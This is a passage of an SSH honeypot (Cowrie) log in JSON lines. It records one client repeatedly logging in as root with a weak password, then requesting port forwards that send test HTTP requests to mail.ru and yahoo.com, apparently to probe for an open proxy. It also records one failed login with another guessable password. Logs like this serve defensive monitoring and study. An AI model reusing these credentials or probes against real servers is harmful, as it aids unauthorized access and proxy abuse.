,"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:49:50.778414Z","src_ip":"77.83.207.83","session":"565c05a8cfc2"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:49:51.025214Z","src_ip":"77.83.207.83","session":"565c05a8cfc2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":21928,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:21928","sensor":"my-vps","timestamp":"2025-08-31T03:49:51.075961Z","session":"565c05a8cfc2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:51.125478Z","src_ip":"77.83.207.83","session":"565c05a8cfc2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":15735,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:15735","sensor":"my-vps","timestamp":"2025-08-31T03:49:51.267759Z","session":"565c05a8cfc2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:51.317324Z","src_ip":"77.83.207.83","session":"565c05a8cfc2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":4137,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:4137","sensor":"my-vps","timestamp":"2025-08-31T03:49:51.459819Z","session":"565c05a8cfc2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:51.509472Z","src_ip":"77.83.207.83","session":"565c05a8cfc2"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:49:51.559855Z","src_ip":"77.83.207.83","session":"565c05a8cfc2"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":11874,"dst_ip":"1.2.3.4","dst_port":22,"session":"913c329253de","protocol":"ssh","message":"New connection: 77.83.207.83:11874 (1.2.3.4:22) [session: 913c329253de]","sensor":"my-vps","timestamp":"2025-08-31T03:49:51.609555Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:49:51.610369Z","src_ip":"77.83.207.83","session":"913c329253de"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:49:51.660330Z","src_ip":"77.83.207.83","session":"913c329253de"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:49:51.909963Z","src_ip":"77.83.207.83","session":"913c329253de"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":5309,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:5309","sensor":"my-vps","timestamp":"2025-08-31T03:49:51.961967Z","session":"913c329253de"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:52.012427Z","src_ip":"77.83.207.83","session":"913c329253de"}
{"eventid":"cowrie.login.failed","username":"master","password":"1234567","message":"login attempt [master/1234567] failed","sensor":"my-vps","timestamp":"2025-08-31T03:49:52.116731Z","src_ip":"212.227.235.229","session":"6fc049fd5486"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":11530,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:11530","sensor":"my-vps","timestamp":"2025-08-31T03:49:52.156678Z","session":"913c329253de"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:52.206954Z","src_ip":"77.83.207.83","session":"913c329253de"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":25667,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:25667","sensor":"my-vps","timestamp":"2025-08-31T03:49:52.348578Z","session":"913c329253de"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:52.398903Z","src_ip":"77.83.207.83","session":"913c329253de"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:49:52.450056Z","src_ip":"77.83.207.83","session":"913c329253de"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":11974,"dst_ip":"1.2.3.4","dst_port":22,"session":"f30d72c505bc","protocol":"ssh","message":"New connection: 77.83.207.83:11974 (1.2.3.4:22) [session: f30d72c505bc]","sensor":"my-vps","timestamp":"2025-08-31T03:49:52.499375Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:49:52.509196Z","src_ip":"77.83.207.83","session":"f30d72c505bc"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:49:52.550202Z","src_ip":"77.83.207.83","session":"f30d72c505bc"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:49:52.801088Z","src_ip":"77.83.207.83","session":"f30d72c505bc"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":11876,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:11876","sensor":"my-vps","timestamp":"2025-08-31T03:49:52.852061Z","session":"f30d72c505bc"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:52.902385Z","src_ip":"77.83.207.83","session":"f30d72c505bc"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"77.83.207.83","src_port":18458,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:18458","sensor":"my-vps","timestamp":"2025-08-31T03:49:53.044606Z","session":"f30d72c505bc"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:53.095466Z","src_ip":"77.83.207.83","session":"f30d72c505bc"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":25323,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:25323","sensor":"my-vps","timestamp":"2025-08-31T03:49:53.236584Z","session":"f30d72c505bc"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:53.286899Z","src_ip":"77.83.207.83","session":"f30d72c505bc"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:49:53.337785Z","src_ip":"77.83.207.83","session":"f30d72c505bc"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":12103,"dst_ip":"1.2.3.4","dst_port":22,"session":"b6fbdefd284b","protocol":"ssh","message":"New connection: 77.83.207.83:12103 (1.2.3.4:22) [session: b6fbdefd284b]","sensor":"my-vps","timestamp":"2025-08-31T03:49:53.386366Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:49:53.387106Z","src_ip":"77.83.207.83","session":"b6fbdefd284b"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:49:53.436955Z","src_ip":"77.83.207.83","session":"b6fbdefd284b"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:49:53.685918Z","src_ip":"77.83.207.83","session":"b6fbdefd284b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":26540,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:26540","sensor":"my-vps","timestamp":"2025-08-31T03:49:53.736726Z","session":"b6fbdefd284b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:53.786588Z","src_ip":"77.83.207.83","session":"b6fbdefd284b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":10622,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:10622","sensor":"my-vps","timestamp":"2025-08-31T03:49:53.928514Z","session":"b6fbdefd284b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:53.978839Z","src_ip":"77.83.207.83","session":"b6fbdefd284b"}
{"eventid":"cowrie.session.closed","duration":"8.8","message":"Connection lost after 8.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:49:54.007215Z","src_ip":"212.227.235.229","session":"6fc049fd5486"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":30193,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:30193","sensor":"my-vps","timestamp":"2025-08-31T03:49:54.120422Z","session":"b6fbdefd284b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:54.170368Z","src_ip":"77.83.207.83","session":"b6fbdefd284b"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:49:54.221022Z","src_ip":"77.83.207.83","session":"b6fbdefd284b"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":12206,"dst_ip":"1.2.3.4","dst_port":22,"session":"64bee91bad27","protocol":"ssh","message":"New connection: 77.83.207.83:12206 (1.2.3.4:22) [session: 64bee91bad27]","sensor":"my-vps","timestamp":"2025-08-31T03:49:54.271613Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:49:54.272249Z","src_ip":"77.83.207.83","session":"64bee91bad27"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:49:54.323476Z","src_ip":"77.83.207.83","session":"64bee91bad27"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:49:54.577942Z","src_ip":"77.83.207.83","session":"64bee91bad27"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":4860,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:4860","sensor":"my-vps","timestamp":"2025-08-31T03:49:54.629925Z","session":"64bee91bad27"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:54.681123Z","src_ip":"77.83.207.83","session":"64bee91bad27"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":485,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:485","sensor":"my-vps","timestamp":"2025-08-31T03:49:54.825332Z","session":"64bee91bad27"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:54.876595Z","src_ip":"77.83.207.83","session":"64bee91bad27"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":22104,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:22104","sensor":"my-vps","timestamp":"2025-08-31T03:49:55.021358Z","session":"64bee91bad27"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:55.072538Z","src_ip":"77.83.207.83","session":"64bee91bad27"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:49:55.124313Z","src_ip":"77.83.207.83","session":"64bee91bad27"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":12301,"dst_ip":"1.2.3.4","dst_port":22,"session":"e883c0579b37","protocol":"ssh","message":"New connection: 77.83.207.83:12301 (1.2.3.4:22) [session: e883c0579b37]","sensor":"my-vps","timestamp":"2025-08-31T03:49:55.174812Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:49:55.176232Z","src_ip":"77.83.207.83","session":"e883c0579b37"}
